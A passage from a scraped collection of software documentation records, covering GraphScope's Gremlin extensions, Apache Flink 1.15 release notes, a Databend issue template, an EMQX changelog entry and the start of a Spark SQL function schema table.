out()).values(\"id\") ``` The unfold()-step unrolls an iterator, iterable or map into a linear form. ```bash g.V().fold().unfold().values(\"id\") g.V().fold().as(\"a\").unfold().values(\"id\") g.V().has(\"name\", \"marko\").fold().as(\"a\").select(\"a\").unfold().values(\"id\") g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').unfold() ``` The following steps are extended to denote more complex situations. In Graph querying, expanding a multiple-hops path from a starting point is called `PathExpand`, which is commonly used in graph scenarios. In addition, there are different requirements for expanding strategies in different scenarios, i.e. it is required to output a simple path or all vertices explored along the expanding path. We introduce the with()-step to configure the corresponding behaviors of the `PathExpand`-step. Expand a multiple-hops path along the outgoing edges, which length is within the given range. Parameters: </br> lengthRange - the lower and the upper bounds of the path length, </br> edgeLabels - the edge labels to traverse. Usages of the with()-step: </br> keyValuePair - the options to configure the corresponding behaviors of the `PathExpand`-step. ```bash g.V().out(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') g.V().out(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'ALLVE') g.V().out(\"1..10\").with('PATHOPT', 'SIMPLE').with('RESULTOPT', 'ALL_V') g.V().out(\"1..10\") g.V().out(\"1..10\", \"knows\") g.V().out(\"1..10\", \"knows\", \"created\") g.V().out(\"1..10\").with('RESULTOPT', 'ALLV').values(\"name\") ``` Running Example: ```bash gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[1], v[2]] ==>[v[1], v[4]] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[2]] ==>, v[4]] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[2] ==>v[4] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').values(\"name\") ==>[marko, vadas] ==>[marko, josh] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').valueMap(\"id\",\"name\") ==>{id=[[1, 2]], name=[[marko, vadas]]} ==>{id=[[1, 4]], name=[[marko, josh]]} ``` Expand a multiple-hops path along the incoming edges, which length is within the given range. ```bash g.V().in(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') ``` Running Example: ```bash gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[2], v[1]] ==>[v[4], v[1]] gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[1]] ==>, v[1]] gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[1] ==>v[1] ``` Expand a multiple-hops path along the incident edges, which length is within the given range. ```bash g.V().both(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') ``` Running Example: ```bash gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[2], v[1]] ==>[v[1], v[2]] ==>[v[1], v[4]] ==>[v[2], v[1], v[2]] ==>[v[2], v[1], v[4]] ==>[v[4], v[1]] ==>[v[1], v[2], v[1]] ==>[v[1], v[4], v[1]] ==>[v[4], v[1], v[2]] ==>[v[4], v[1], v[4]] gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[1]] ==>, v[1]] ==>, v[2]] ==>, v[4]] ==>, v, v[2]] ==>, v, v[4]] ==>, v, v[2]] ==>, v, v[4]] ==>, v, v[1]] ==>, v, v[1]] gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[1] ==>v[1] ==>v[2] ==>v[4] ==>v[2] ==>v[1] ==>v[1] ==>v[4] ==>v[2] ==>v[4] ``` By default, all kept vertices are stored in a path collection which can be unfolded by a `endV()`-step. ```bash g.V().out(\"1..10\").with('RESULTOPT', 'ALLV') g.V().out(\"1..10\").with('RESULTOPT', 'ALLV').endV() ``` Expressions, expressed via the `expr()` syntactic sugar, have been introduced to facilitate writing expressions directly within steps such as `select()`, `project()`, `where()`, and `group()`. This update is part of an ongoing effort to standardize Gremlin's expression syntax, making it more aligned with . The updated syntax, effective from version 0.27.0, streamlines user operations and enhances readability. Below, we detail the updated syntax definitions and point out key distinctions from the syntax used prior to version 0.26.0. Literal: Category | Syntax | - string | \"marko\" boolean | true, false integer | 1, 2, 3 long | 1l, 1L float | 1.0f," }, { "data": "double | 1.0, 1.0d, 1.0D list | [\"marko\", \"vadas\"], [true, false], [1, 2], [1L, 2L], [1.0F, 2.0F], [1.0, 2.0] Variable: Category | Description | Before 0.26.0 | Since 0.27.0 | - | - | - current | the current entry | @ | _ current property | the property value of the current entry | @.name | _.name tag | the specified tag | @a | a tag property | the property value of the specified tag | @a.name | a.name Operator: Category | Operation (Case-Insensitive) | Description | Before 0.26.0 | Since 0.27.0 | - | - | - | - logical | = | equal | @.name == \"marko\" | _.name = \"marko\" logical | <> | not equal | @.name != \"marko\" | _.name != \"marko\" logical | > | greater than | @.age > 10 | _.age > 10 logical | < | less than | @.age < 10 | _.age < 10 logical | >= | greater than or equal | @.age >= 10 | _.age >= 10 logical | <= | less than or equal | @.age <= 10 | _.age <= 10 logical | NOT | negate the logical expression | ! (@.name == \"marko\") | NOT _.name = \"marko\" logical | AND | connect two logical expressions with AND | @.name == \"marko\" && @.age > 10 | .name = \"marko\" AND .age > 10 logical | OR | connect two logical expressions with OR | @.name == \"marko\" \\|\\| @.age > 10 | .name = \"marko\" OR .age > 10 logical | IN | whether the value of the current entry is in the given list | @.name WITHIN [\"marko\", \"vadas\"] | _.name IN [\"marko\", \"vadas\"] logical | IS NULL | whether the value of the current entry ISNULL | @.age IS NULL | _.age IS NULL logical | IS NOT NULL | whether the value of the current entry IS NOT NULL | ! (@.age ISNULL) | _.age IS NOT NULL arithmetical | + | addition | @.age + 10 | _.age + 10 arithmetical | - | subtraction | @.age - 10 | _.age - 10 arithmetical | | multiplication | @.age 10 | _.age * 10 arithmetical | / | division | @.age / 10 | _.age / 10 arithmetical | % | modulo | @.age % 10 | _.age % 10 arithmetical | POWER | exponentiation | @.age ^^ 3 | POWER(_.age, 3) temporal arithmetical | + | Add a duration to a temporal type | unsupported | _.creationDate + duration({years: 1}) temporal arithmetical | - | Subtract a duration from a temporal type | unsupported | _.creationDate - duration({years: 1}) temporal arithmetical | - | Subtract two temporal types, returning a duration in milliseconds | unsupported | a.creationDate -" }, { "data": "temporal arithmetical | + | Add two durations | unsupported | duration({years: 1}) + duration({months: 2}) temporal arithmetical | - | Subtract two durations | unsupported | duration({years: 1}) - duration({months: 2}) temporal arithmetical | | Multiply a duration by a numeric value | unsupported | duration({years: 1}) 2 temporal arithmetical | / | Divide a duration by a numeric value | unsupported | duration({years: 1}) / 2, (a.creationDate - b.creationDate) / 1000 bitwise | & | bitwise AND | @.age & 2 | _.age & 2 bitwise | \\| | bitwise OR | @.age \\| 2 | _.age \\| 2 bitwise | ^ | bitwise XOR | @.age ^ 2 | _.age ^ 2 bit shift | << | left shift | @.age << 2 | _.age << 2 bit shift | >> | right shift | @.age >> 2 | _.age >> 2 string regex match | STARTS WITH | whether the string starts with the given prefix | @.name STARTSWITH \"ma\" | _.name STARTS WITH \"ma\" string regex match | NOT STARTS WITH | whether the string does not start with the given prefix | ! (@.name STARTSWITH \"ma\") | NOT _.name STARTS WITH \"ma\" string regex match | ENDS WITH | whether the string ends with the given suffix | @.name ENDSWITH \"ko\" | _.name ENDS WITH \"ko\" string regex match | NOT ENDS WITH | whether the string does not end with the given suffix | ! (@.name ENDSWITH \"ko\") | NOT _.name ENDS WITH \"ko\" string regex match | CONTAINS | whether the string contains the given substring | \"ar\" WITHIN @.name | _.name CONTAINS \"ar\" string regex match | NOT CONTAINS | whether the string does not contain the given substring | \"ar\" WITHOUT @.name | NOT _.name CONTAINS \"ar\" Function: Category | Function (Case-Insensitive) | Description | Before 0.26.0 | Since 0.27.0 | - | - | - | - aggregate | COUNT | count the number of the elements | unsupported | COUNT(_.age) aggregate | SUM | sum the values of the elements | unsupported | SUM(_.age) aggregate | MIN | find the minimum value of the elements | unsupported | MIN(_.age) aggregate | MAX | find the maximum value of the elements | unsupported | MAX(_.age) aggregate | AVG | calculate the average value of the elements | unsupported | AVG(_.age) aggregate | COLLECT | fold the elements into a list | unsupported | COLLECT(_.age) aggregate | HEAD(COLLECT()) | find the first value of the elements | unsupported | HEAD(COLLECT(_.age)) other | LABELS | get the labels of the specified tag which is a vertex | @a.~label | LABELS(a) other | elementId | get a vertex or an edge identifier, unique by an object type and a database | @a.~id | elementId(a) other | TYPE | get the type of the specified tag which is an edge | @a.~label |TYPE(a) other | LENGTH | get the length of the specified tag which is a path | @a.~len | LENGTH(a) Expression in project or filter: Category | Description | Before 0.26.0 | Since 0.27.0 | - | - | - filter | filter the current traverser by the expression | where(expr(\"@.name == \\\\\"marko\\\\\"\")) | where(expr(_.name = \"marko\")) project | project the current traverser to the value of the expression | select(expr(\"@.name\")) | select(expr(_.name)) Here we provide the precedence of the operators mentioned above, which is also based on the SQL standard. Precedence | Operator | Description | Associativity | | | 1 | `()`, `.`, power()," }, { "data": "| Parentheses, Member access, Function call | Left-to-right 2 | -a, +a | Unary minus, Unary plus | Right-to-left 3 | `*`, `/`, `%` | Multiplication, Division, Modulus | Left-to-right 4 | `+`, `-`, `&`, `\\|`, `^`, `<<`, `>>` | Addition, Subtraction, Bitwise AND, Bitwise OR, Bitwise XOR, Left shift, Right shift | Left-to-right 5 | STARTS WITH, ENDS WITH, CONTAINS, IN | String regex match, Collection membership | Left-to-right 6 | `=`, `<>`, `<`, `<=`, `>`, `>=` | Comparison | Left-to-right 7 | IS NULL, IS NOT NULL | Nullness check | Left-to-right 8 | NOT | Logical NOT | Right-to-left 9 | AND | Logical AND | Left-to-right 10 | OR | Logical OR | Left-to-right ```bash gremlin> :submit g.V().where(expr(_.name = \"marko\")) ==>v[1] gremlin> :submit g.V().as(\"a\").where(expr(a.name = \"marko\" OR a.age > 10)) ==>v[6] ==>v[1] ==>v[2] ==>v[4] gremlin> :submit g.V().as(\"a\").where(expr(a.age IS NULL)).values(\"name\") ==>lop ==>ripple gremlin> :submit g.V().as(\"a\").where(expr(a.age IS NOT NULL)).values(\"name\") ==>vadas ==>josh ==>marko ==>peter gremlin> :submit g.V().as(\"a\").where(expr(a.name STARTS WITH \"ma\")) ==>v[1] gremlin> :submit g.V().select(expr(_.name)) ==>vadas ==>josh ==>lop ==>ripple ==>marko ==>peter gremlin> :submit g.V().hasLabel(\"person\").select(expr(_.age ^ 1)) ==>26 ==>28 ==>33 ==>34 gremlin> :submit g.V().hasLabel(\"person\").select(expr(POWER(_.age, 2))) ==>729 ==>1024 ==>1225 ==>841 ``` The group()-step in standard Gremlin has limited capabilities (i.e. grouping can only be performed based on a single key, and only one aggregate calculation can be applied in each group), which cannot be applied to the requirements of performing group calculations on multiple keys or values; Therefore, we further extend the capabilities of the group()-step, allowing multiple variables to be set and different aliases to be configured in key by()-step and value by()-step respectively. Usages of the key by()-step: ```bash group().by(values(\"name\").as(\"k1\"), values(\"age\").as(\"k2\")) group().by(out().count().as(\"k1\"), values(\"name\").as(\"k2\")) ``` Usages of the value by()-step: ```bash group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")) ``` Running Example: ```bash gremlin> g.V().hasLabel(\"person\").group().by(values(\"name\").as(\"k1\"), values(\"age\").as(\"k2\")) ==>{[josh, 32]=[v[4]], [vadas, 27]=[v[2]], [peter, 35]=[v[6]], [marko, 29]=[v[1]]} gremlin> g.V().hasLabel(\"person\").group().by(out().count().as(\"k1\"), values(\"name\").as(\"k2\")) ==>{[2, josh]=[v[4]], [0, vadas]=[v[2]], [3, marko]=[v[1]], [1, peter]=[v[6]]} gremlin> g.V().hasLabel(\"person\").group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")) ==>{marko=[1, 29], peter=[1, 35], josh=[1, 32], vadas=[1, 27]} gremlin> g.V().hasLabel(\"person\").group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")).select(\"v1\", \"v2\") ==>{v1=1, v2=35} ==>{v1=1, v2=32} ==>{v1=1, v2=27} ==>{v1=1, v2=29} ``` Here we list steps which are unsupported yet. Some will be supported in the near future while others will remain unsupported for some reasons. The following steps will be supported in the near future. <!--#### identity() Map the current object to itself. ```bash g.V().identity() g.V().union(identity(), out().out()) ```<--> Map the traverser to its path history. ```bash g.V().out().out().path() g.V().as(\"a\").out().out().select(\"a\").by(\"name\").path() ``` Unrolls a iterator, iterable or map into a linear form. ```bash g.V().fold().unfold() ``` ```bash g.V().fold().count(local) g.V().values('age').fold().sum(local) ``` The following steps will remain unsupported. repeat().times() </br> In graph pattern scenarios, `repeat().times()` can be replaced equivalently by the `PathExpand`-step. ```bash g.V().repeat(out(\"knows\")).times(2) g.V().repeat(out(\"knows\")).emit().times(2) g.V().repeat(out(\"knows\").simplePath()).times(2) g.V().repeat(out(\"knows\").simplePath()).emit().times(2) ``` repeat().until() </br> It is a imperative syntax, not declarative. The properties()-step retrieves and then unfolds properties from a graph element. The valueMap()-step can reflect all the properties of each graph element in a map form, which could be much more clear than the results of the properties()-step for the latter could mix up the properties of all the graph elements in the same output. It is required to maintain global variables for `SideEffect`-step during actual execution, which is hard to implement in distributed scenarios. i.e. group(\"a\") groupCount(\"a\") aggregate(\"a\") sack() Currently, we only support the operations of merging multiple streams into one. The following splitting operations are unsupported: branch() choose()" } ]
{ "category": "App Definition and Development", "file_name": "flink-1.15.md", "project_name": "Flink", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Release Notes - Flink 1.15\" <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> These release notes discuss important aspects, such as configuration, behavior, or dependencies, that changed between Flink 1.14 and Flink 1.15. Please read these notes carefully if you are planning to upgrade your Flink version to 1.15. There are Several changes in Flink 1.15 that require updating dependency names when upgrading from earlier versions, mainly including the effort to opting-out Scala dependencies from non-scala modules and reorganize table modules. A quick checklist of the dependency changes is as follows: Any dependency to one of the following modules needs to be updated to no longer include a suffix: ``` flink-cep flink-clients flink-connector-elasticsearch-base flink-connector-elasticsearch6 flink-connector-elasticsearch7 flink-connector-gcp-pubsub flink-connector-hbase-1.4 flink-connector-hbase-2.2 flink-connector-hbase-base flink-connector-jdbc flink-connector-kafka flink-connector-kinesis flink-connector-nifi flink-connector-pulsar flink-connector-rabbitmq flink-container flink-dstl-dfs flink-gelly flink-hadoop-bulk flink-kubernetes flink-runtime-web flink-sql-connector-elasticsearch6 flink-sql-connector-elasticsearch7 flink-sql-connector-hbase-1.4 flink-sql-connector-hbase-2.2 flink-sql-connector-kafka flink-sql-connector-kinesis flink-sql-connector-rabbitmq flink-state-processor-api flink-statebackend-rocksdb flink-streaming-java flink-test-utils flink-yarn flink-table-api-java-bridge flink-table-runtime flink-sql-client flink-orc flink-orc-nohive flink-parquet ``` For Table / SQL users, the new module `flink-table-planner-loader` replaces `flink-table-planner_2.12` and avoids the need for a Scala suffix. For backwards compatibility, users can still swap it with `flink-table-planner_2.12` located in `opt/`. `flink-table-uber` has been split into `flink-table-api-java-uber`, `flink-table-planner(-loader)`, and `flink-table-runtime`. Scala users need to explicitly add a dependency to `flink-table-api-scala` or `flink-table-api-scala-bridge`. The detail of the involved issues are listed as follows. The Java DataSet/-Stream APIs are now independent of Scala and no longer transitively depend on it. The implications are the following: If you only intend to use the Java APIs, with Java types, then you can opt-in to a Scala-free Flink by removing the `flink-scala` jar from the `lib/` directory of the distribution. You are then free to use any Scala version and Scala libraries. You can either bundle Scala itself in your user-jar; or put into the `lib/` directory of the distribution. If you relied on the Scala APIs, without an explicit dependency on them, then you may experience issues when building your projects. You can solve this by adding explicit dependencies to the APIs that you are using. This should primarily affect users of the Scala `DataStream/CEP` APIs. A lot of modules have lost their Scala suffix. Further caution is advised when mixing dependencies from different Flink versions (e.g., an older connector), as you may now end up pulling in multiple versions of a single module (that would previously be prevented by the name being equal). The new module `flink-table-planner-loader` replaces" }, { "data": "and avoids the need for a Scala suffix. It is included in the Flink distribution under `lib/`. For backwards compatibility, users can still swap it with `flink-table-planner_2.12` located in `opt/`. As a consequence, `flink-table-uber` has been split into `flink-table-api-java-uber`, `flink-table-planner(-loader)`, and `flink-table-runtime`. `flink-sql-client` has no Scala suffix anymore. It is recommended to let new projects depend on `flink-table-planner-loader` (without Scala suffix) in provided scope. Note that the distribution does not include the Scala API by default. Scala users need to explicitly add a dependency to `flink-table-api-scala` or `flink-table-api-scala-bridge`. The `flink-table-runtime` has no Scala suffix anymore. Make sure to include `flink-scala` if the legacy type system (based on TypeInformation) with case classes is still used within Table API. The table file system connector is not part of the `flink-table-uber` JAR anymore but is a dedicated (but removable) `flink-connector-files` JAR in the `/lib` directory of a Flink distribution. The support of Java 8 is now deprecated and will be removed in a future release (). We recommend all users to migrate to Java 11. The default Java version in the Flink docker images is now Java 11 (). There are images built with Java 8, tagged with java8. Support for Scala 2.11 has been removed in . All Flink dependencies that (transitively) depend on Scala are suffixed with the Scala version that they are built for, for example `flink-streaming-scala_2.12`. Users should update all Flink dependecies, changing \"2.11\" to \"2.12\". Scala versions (2.11, 2.12, etc.) are not binary compatible with one another. That also means that there's no guarantee that you can restore from a savepoint, made with a Flink Scala 2.11 application, if you're upgrading to a Flink Scala 2.12 application. This depends on the data types that you have been using in your application. The Scala Shell/REPL has been removed in . The legacy casting behavior has been disabled by default. This might have implications on corner cases (string parsing, numeric overflows, to string representation, varchar/binary precisions). Set `table.exec.legacy-cast-behaviour=ENABLED` to restore the old behavior. `CHAR`/`VARCHAR` lengths are enforced (trimmed/padded) by default now before entering the table sink. Table functions that are called using Scala implicit conversions have been updated to use the new type system and new type inference. Users are requested to update their UDFs or use the deprecated `TableEnvironment.registerFunction` to restore the old behavior temporarily by calling the function via name. `flink-conf.yaml` and other configurations from outer layers (e.g. CLI) are now propagated into `TableConfig`. Even though configuration set directly in `TableConfig` has still precedence, this change can have side effects if table configuration was accidentally set in other layers. The previously deprecated methods `TableEnvironment.execute`, `Table.insertInto`, `TableEnvironment.fromTableSource`, `TableEnvironment.sqlUpdate`, and `TableEnvironment.explain` have been removed. Please use `TableEnvironment.executeSql`, `TableEnvironment.explainSql`, `TableEnvironment.createStatementSet`, as well as `Table.executeInsert`, `Table.explain` and `Table.execute` and the newly introduces classes `TableResult`, `ResultKind`, `StatementSet` and `ExplainDetail`. `STATEMENT` is a reserved keyword now. Use backticks to escape tables, fields and other references. `DataStreamScanProvider` and `DataStreamSinkProvider` for table connectors received an additional method that might break implementations that used lambdas before. We recommend static classes as a replacement and future" }, { "data": "It is recommended to update statement sets to the new SQL syntax: ```SQL EXECUTE STATEMENT SET BEGIN ... END; EXPLAIN STATEMENT SET BEGIN ... END; ``` This changes the result of a decimal `SUM()` with retraction and `AVG()`. Part of the behavior is restored back to be the same with 1.13 so that the behavior as a whole could be consistent with Hive / Spark. The `DecodingFormat` interface was used for both projectable and non-projectable formats which led to inconsistent implementations. The `FileSystemTableSource` has been updated to distinguish between those two interfaces now. Users that implement custom formats for `FileSystemTableSource` might need to verify the implementation and make sure to implement `ProjectableDecodingFormat` if necessary. This might have an impact on existing table source implementations as push down filters might not contain partition predicates anymore. However, the connector implementation for table sources that implement both partition and filter push down became easier with this change. This changes the result of a decimal `SUM()` between 1.14.0 and 1.14.1. It restores the behavior of 1.13 to be consistent with Hive/Spark. The string representation of `BOOLEAN` columns from DDL results (`true/false -> TRUE/FALSE`), and row columns in DQL results (`+I[...] -> (...)`) has changed for printing. The defaults for casting incomplete strings like `\"12\"` to TIME have changed from `12:01:01` to `12:00:00`. `STRING` to `TIMESTAMP(_LTZ)` casting now considers fractional seconds. Previously fractional seconds of any precision were ignored. This adds an additional operator to the topology if the new sink interfaces are used (e.g. for Kafka). It could cause issues in 1.14.1 when restoring from a 1.14 savepoint. A workaround is to cast the time attribute to a regular timestamp in the SQL statement closely before the sink. Functions that returned `VARCHAR(2000)` in 1.14, return `VARCHAR` with maximum length now. In particular this includes: ```SQL SON_VALUE CHR REVERSE SPLIT_INDEX REGEXP_EXTRACT PARSE_URL FROM_UNIXTIME DECODE DATE_FORMAT CONVERT_TZ ``` This issue added IS JSON for Table API. Notes that `IS JSON` does not return `NULL` anymore but always `FALSE` (even if the argument is `NULL`). Disabled `UPSERT INTO` statement. `UPSERT INTO` syntax was exposed by mistake in previous releases without detailed discussed. From this release every `UPSERT INTO` is going to throw an exception. Users of `UPSERT INTO` should use the documented `INSERT INTO` statement instead. Casting to `BOOLEAN` is not allowed from decimal numeric types anymore. This issue aims to fix various primary key issues that effectively made it impossible to use this feature. The change might affect savepoint backwards compatibility for those incorrect pipelines. Also the resulting changelog stream might be different after these changes. Pipelines that were correct before should be restorable from a savepoint. `StreamTableEnvironment.fromChangelogStream` might produce a different stream because primary keys were not properly considered before. The results of `Table#print` have changed to be closer to actual SQL data types. E.g. decimal is printing correctly with leading/trailing zeros. Support for the MapR FileSystem has been dropped. The `flink-connector-testing` module has been removed and users should use `flink-connector-test-utils` module" }, { "data": "Now the formats implementing `BulkWriterFormatFactory` don't need to implement partition keys reading anymore, as it's managed internally by `FileSystemTableSource`. `ElasticsearchXSinkBuilder` supersedes `ElasticsearchSink.Builder` and provides at-least-once writing with the new unified sink interface supporting both batch and streaming mode of DataStream API. For Elasticsearch 7 users that use the old ElasticsearchSink interface (`org.apache.flink.streaming.connectors.elasticsearch7.ElasticsearchSink`) and depend on their own elasticsearch-rest-high-level-client version, updating the client dependency to a version >= 7.14.0 is required due to internal changes. The old JDBC connector (indicated by `connector.type=jdbc` in DDL) has been removed. If not done already, users need to upgrade to the newer stack (indicated by `connector=jdbc` in DDL). New metrics `numRecordsSend` and `numRecordsSendErrors` have been introduced for users to monitor the number of records sent to the external system. The `numRecordsOut` should be used to monitor the number of records transferred between sink tasks. Connector developers should pay attention to the usage of these metrics numRecordsOut, numRecordsSend and numRecordsSendErrors while building sink connectors. Please refer to the new Kafka Sink for details. Additionally, since numRecordsOut now only counts the records sent between sink tasks and numRecordsOutErrors was designed for counting the records sent to the external system, we deprecated numRecordsOutErrors and recommend using numRecordsSendErrors instead. Adds retry logic to the cleanup steps of a finished job. This feature changes the way Flink jobs are cleaned up. Instead of trying once to clean up the job, this step will be repeated until it succeeds. Users are meant to fix the issue that prevents Flink from finalizing the job cleanup. The retry functionality can be configured and disabled. More details can be found . `TaskManagers` now explicitly send a signal to the `JobManager` when shutting down. This reduces the down-scaling delay in reactive mode (which was previously bound to the heartbeat timeout). Job metrics on the TaskManager are now removed when the last slot is released, rather than the last task. This means they may be reported for a longer time than before and when no tasks are running on the TaskManager. Fixes issue where the failover is not listed in the exception history but as a root cause. That could have happened if the failure occurred during `JobMaster` initialization. A new multiple component leader election service was implemented that only runs a single leader election per Flink process. If this should cause any problems, then you can set `high-availability.use-old-ha-services: true` in the `flink-conf.yaml` to use the old high availability services. Attempting to cancel a `FINISHED/FAILED` job now returns 409 Conflict instead of 404 Not Found. All `JobManagers` can now be queried for the status of a savepoint operation, irrespective of which `JobManager` received the initial request. The issue of re-submitting a job in Application Mode when the job finished but failed during cleanup is fixed through the introduction of the new component JobResultStore which enables Flink to persist the cleanup state of a job to the file system. (see ) Since 1.15, sort-shuffle has become the default blocking shuffle implementation and shuffle data compression is enabled by default. These changes influence batch jobs only, for more information, please refer to the" }, { "data": "When restoring from a savepoint or retained externalized checkpoint you can choose the mode in which you want to perform the operation. You can choose from `CLAIM`, `NO_CLAIM`, `LEGACY` (the old behavior). In `CLAIM` mode Flink takes ownership of the snapshot and will potentially try to remove the snapshot at a certain point in time. On the other hand the `NO_CLAIM` mode will make sure Flink does not depend on the existence of any files belonging to the initial snapshot. For a more thorough description see . When taking a savepoint you can specify the binary format. You can choose from native (specific to a particular state backend) or canonical (unified across all state backends). Shared state tracking changed to use checkpoint ID instead of reference counts. Shared state is not cleaned up on abortion anymore (but rather on subsumption or job termination). This might result in delays in discarding the state of aborted checkpoints. Introduce metrics of persistent bytes within each checkpoint (via REST API and UI), which could help users to know how much data size had been persisted during the incremental or change-log based checkpoint. In 1.15 we enabled the support of checkpoints after part of tasks finished by default, and made tasks waiting for the final checkpoint before exit to ensure all data got committed. However, it's worth noting that this change forces tasks to wait for one more checkpoint before exiting. In other words, this change will block the tasks until the next checkpoint get triggered and completed. If the checkpoint interval is long, the tasks' execution time would also be extended largely. In the worst case if the checkpoint interval is `Long.MAX_VALUE`, the tasks would be in fact blocked forever. More information about this feature and how to disable it could be found in . The State Processor API has been migrated from Flinks legacy DataSet API to now run over DataStreams run under `BATCH` execution. The internal log of RocksDB would stay under flink's log directory by default. Minimal supported Hadoop client version is now 2.8.5 (version of the Flink runtime dependency). The client can still talk to older server versions as the binary protocol should be backward compatible. Elasticsearch libraries used by the connector are bumped to 7.15.2 and 6.8.20 respectively. For Elasticsearch 7 users that use the old ElasticsearchSink interface (`org.apache.flink.streaming.connectors.elasticsearch7.ElasticsearchSink`) and depend on their own `elasticsearch-rest-high-level-client` version, will need to update the client dependency to a version >= 7.14.0 due to internal changes. Support for using Zookeeper 3.4 for HA has been dropped. Users relying on Zookeeper need to upgrade to 3.5/3.6. By default Flink now uses a Zookeeper 3.5 client. Kafka connector uses Kafka client 2.8.1 by default now. For security purposes, standalone clusters now bind the REST API and RPC endpoints to localhost by default. The goal is to prevent cases where users unknowingly exposed the cluster to the outside, as they would previously bind to all interfaces. This can be reverted by removing the: `rest.bind-address` `jobmanager.bind-host` `taskmanager.bind-host` settings from the flink-conf.yaml . Note that within Docker containers, the REST API still binds to 0.0.0.0." } ]
{ "category": "App Definition and Development", "file_name": "10_feature_request.md", "project_name": "Databend", "subcategory": "Database" }
[ { "data": "name: Feature request title: 'Feature: ' about: Suggest an idea for Databend labels: [ \"C-feature\" ] Summary Description for this feature." } ]
{ "category": "App Definition and Development", "file_name": "fix-12359.en.md", "project_name": "EMQ Technologies", "subcategory": "Streaming & Messaging" }
[ { "data": "Fixed an issue that could lead to error messages when restarting a node configured with some types of data bridges. Said bridges could also start in a failed state, requiring manual restart." } ]
{ "category": "App Definition and Development", "file_name": "sql-expression-schema.md", "project_name": "Apache Spark", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Automatically generated by ExpressionsSchemaSuite --> | Class name | Function name or alias | Query example | Output schema | | - | - | - | - | | org.apache.spark.sql.catalyst.expressions.Abs | abs | SELECT abs(-1) | struct<abs(-1):int> | | org.apache.spark.sql.catalyst.expressions.Acos | acos | SELECT acos(1) | struct<ACOS(1):double> | | org.apache.spark.sql.catalyst.expressions.Acosh | acosh | SELECT acosh(1) | struct<ACOSH(1):double> | | org.apache.spark.sql.catalyst.expressions.Add | + | SELECT 1 + 2 | struct<(1 + 2):int> | | org.apache.spark.sql.catalyst.expressions.AddMonths | addmonths | SELECT addmonths('2016-08-31', 1) | struct<add_months(2016-08-31, 1):date> | | org.apache.spark.sql.catalyst.expressions.AesDecrypt | aesdecrypt | SELECT aesdecrypt(unhex('83F16B2AA704794132802D248E6BFD4E380078182D1544813898AC97E709B28A94'), '0000111122223333') | struct<aes_decrypt(unhex(83F16B2AA704794132802D248E6BFD4E380078182D1544813898AC97E709B28A94), 0000111122223333, GCM, DEFAULT, ):binary> | | org.apache.spark.sql.catalyst.expressions.AesEncrypt | aesencrypt | SELECT hex(aesencrypt('Spark', '0000111122223333')) | struct<hex(aes_encrypt(Spark, 0000111122223333, GCM, DEFAULT, , )):string> | | org.apache.spark.sql.catalyst.expressions.And | and | SELECT true and true | struct<(true AND true):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayAggregate | aggregate | SELECT aggregate(array(1, 2, 3), 0, (acc, x) -> acc + x) | struct<aggregate(array(1, 2, 3), 0, lambdafunction((namedlambdavariable() + namedlambdavariable()), namedlambdavariable(), namedlambdavariable()), lambdafunction(namedlambdavariable(), namedlambdavariable())):int> | | org.apache.spark.sql.catalyst.expressions.ArrayAggregate | reduce | SELECT reduce(array(1, 2, 3), 0, (acc, x) -> acc + x) | struct<reduce(array(1, 2, 3), 0, lambdafunction((namedlambdavariable() + namedlambdavariable()), namedlambdavariable(), namedlambdavariable()), lambdafunction(namedlambdavariable(), namedlambdavariable())):int> | | org.apache.spark.sql.catalyst.expressions.ArrayAppend | arrayappend | SELECT arrayappend(array('b', 'd', 'c', 'a'), 'd') | struct<array_append(array(b, d, c, a), d):array<string>> | | org.apache.spark.sql.catalyst.expressions.ArrayCompact | arraycompact | SELECT arraycompact(array(1, 2, 3, null)) | struct<array_compact(array(1, 2, 3, NULL)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayContains | arraycontains | SELECT arraycontains(array(1, 2, 3), 2) | struct<array_contains(array(1, 2, 3), 2):boolean> | | org.apache.spark.sql.catalyst.expressions.ArrayDistinct | arraydistinct | SELECT arraydistinct(array(1, 2, 3, null, 3)) | struct<array_distinct(array(1, 2, 3, NULL, 3)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayExcept | arrayexcept | SELECT arrayexcept(array(1, 2, 3), array(1, 3, 5)) | struct<array_except(array(1, 2, 3), array(1, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.ArrayExists | exists | SELECT 